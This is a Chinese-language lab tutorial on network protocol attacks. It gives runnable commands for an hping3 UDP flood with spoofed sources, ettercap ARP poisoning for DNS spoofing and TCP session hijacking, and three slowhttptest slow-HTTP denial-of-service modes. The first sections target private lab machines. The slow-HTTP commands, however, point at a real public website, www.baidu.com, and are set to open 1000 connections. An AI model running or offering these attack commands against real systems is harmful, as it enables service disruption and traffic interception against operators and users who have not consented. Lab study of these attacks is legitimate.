协议攻击（二）

目录

• • 6.UDP Flood攻击
  • • • 原理
      • 环境
      • 步骤
  • 7.DNS欺骗攻击与防御
  • • • 原理
      • 环境
      • 步骤
  • 8.TCP会话劫持攻击
  • • • 原理
      • 环境
      • 步骤
  • 9.HTTP慢速攻击
  • • • 原理
      • 环境
    • slowloris模式
    • Slow Body攻击
    • Slow Read模式

6.UDP Flood攻击

原理

由于UDP协议的无状态不可靠的天然特性，UDPFlood拒绝服务攻击的原理非常简单，即通过向目标主机和网络发送大量的UDP数据包，造成目标主机显著的计算负载提升，或者目标网络的网络拥塞，从而使得目标主机和网络陷入不可用的状态，造成拒绝服务攻击。

环境

靶机：centos 192.168.0.120 攻击机：kali 192.168.0.118

步骤

Kali向centos7发起udp flood攻击，并使用tcpdump进行分析

1.Centos开启对udp 22端口的监听

tcpdump -i ens33 udp port 22

2.kali向centos的22端口发起udp flood攻击

hping3 --udp -p 22 192.168.0.120

3.此时centos监听到大量udp包

4.攻击进一步升级，使用工具自带的随机源地址参数进行源地址欺骗udp flood攻击：

hping3 --udp -p 22 192.168.0.120  --flood --rand-source

5.Centos监听22端口，发现大量机ip地址的udp流量

tcpdump -i ens33 udp port 22  

7.DNS欺骗攻击与防御

原理

DNS（DomainNameSystem，域名系统），因特网上作为域名和IP地址相互映射的一个分布式数据库，能够使用户更方便的访问互联网，而不用记住IP地址。DNS协议运行在UDP协议之上，使用端口号53，DNS并不包含任何认证机制，因此第三方可以对DNS数据包进行伪造。

环境

靶机：ubuntu 192.168.0.122 攻击机：kali 192.168.0.118

步骤

Kali利用ettercap对centos7进行dns欺骗攻击并观察结果，然后尝试静态绑定IP/DNS后再观察结果。 1.在kali中编辑ettercap的配置文件,将所有.com的域名都解析到kali的ip：

vim /etc/ettercap/etter.dns

2.然后kali开启apache服务

/etc/init.d/apache2 start

Ubuntu上能正常访问

然后在ubuntu上访问百度，也是正常的

2.下面在kali上启动ettercap工具利用arp中间人攻击实现dns欺骗

ettercap -G

点击勾勾启动

然后选择arp欺骗中间人攻击

选择ok

启用dns_spoof插件

然后再在ubuntu里面输入www.baidu.com，就会进入kali开启的网页

额，这里不知道哪一步出错了，还是百度原网页 如果配置都正确的话，输入百度应该出现的是这个页面

使用nalookup查看，发现dns解析失败，没有解析到kali上去

nslookup www.baidu.com

等会就解决这个问题

8.TCP会话劫持攻击

原理

TCP会话劫持目标是劫持通信双方已建立的TCP会话连接，假冒其中一方（通常是客户端）的身份，与另一方进行进一步通信。

环境

靶机：ubuntu 192.168.0.122 靶机：centos 192.168.0.120 攻击机：kali 192.168.0.118

步骤

Kali通过ARP欺骗成为中间人，从而通过截获TCP数据包，对centos和ubuntu之间的TCP会话进行劫持。 1.在kali中设置ip路由转发

echo 1 > /proc/sys/net/ipv4/ip_forward

2.在kali中打开ettercap的图形界面

ettercap -G

3.将ubuntu和centos分别设置为target1和target2

4.选择arp poisoning，然后ok

出现这玩意就对了

5.然后进入view

选择第一个

到这里，kali先告一段落

6.分别在两个靶机里查看arp缓存 发现arp欺骗已经进行

7.然后ubuntu远程访问centos

Ssh root@192.168.0.120

kali里面监听数据

因为ssh是加密传输，所以这是密文

9.HTTP慢速攻击

原理

HTTP慢速攻击也叫slow http attack，是一种DoS攻击的方式。由于HTTP请求底层使用TCP网络连接进行会话，因此如果中间件对会话超时时间设置不合理，并且HTTP在发送请求的时候采用慢速发HTTP请求，就会导致占用一个HTTP连接会话。如果发送大量慢速的HTTP包就会导致拒绝服务攻击DoS。

这种攻击一共有三种模式

1.Slow headers(也称slowloris)：Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部，Web服务器再没接收到2个连续的\r\n时，会认为客户端没有发送完头部，而持续的等等客户端发送数据，消耗服务器的连接和内存资源。

2.Slow body(也称Slow HTTP POST)：攻击者发送一个HTTP POST请求，该请求的Content-Length头部值很大，使得Web服务器或代理认为客户端要发送很大的数据。服务器会保持连接准备接收数据，但攻击客户端每次只发送很少量的数据，使该连接一直保持存活，消耗服务器的连接和内存资源。

3.Slow read(也称Slow Read attack)：客户端与服务器建立连接并发送了一个HTTP请求，客户端发送完整的请求给服务器端，然后一直保持这个连接，以很低的速度读取Response，比如很长一段时间客户端不读取任何数据，通过发送Zero Window到服务器，让服务器误以为客户端很忙，直到连接快超时前才读取一个字节，以消耗服务器的连接和内存资源。

环境

首先，安装slowhttptest

apt-get install slowhttptest

slowloris模式

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://www.baidu.com/ -x 24 -p 3

Slow Body攻击

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://www.baidu.com -x 10 -p 3

Slow Read模式

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u https://www.baidu.com -p 5 -l 350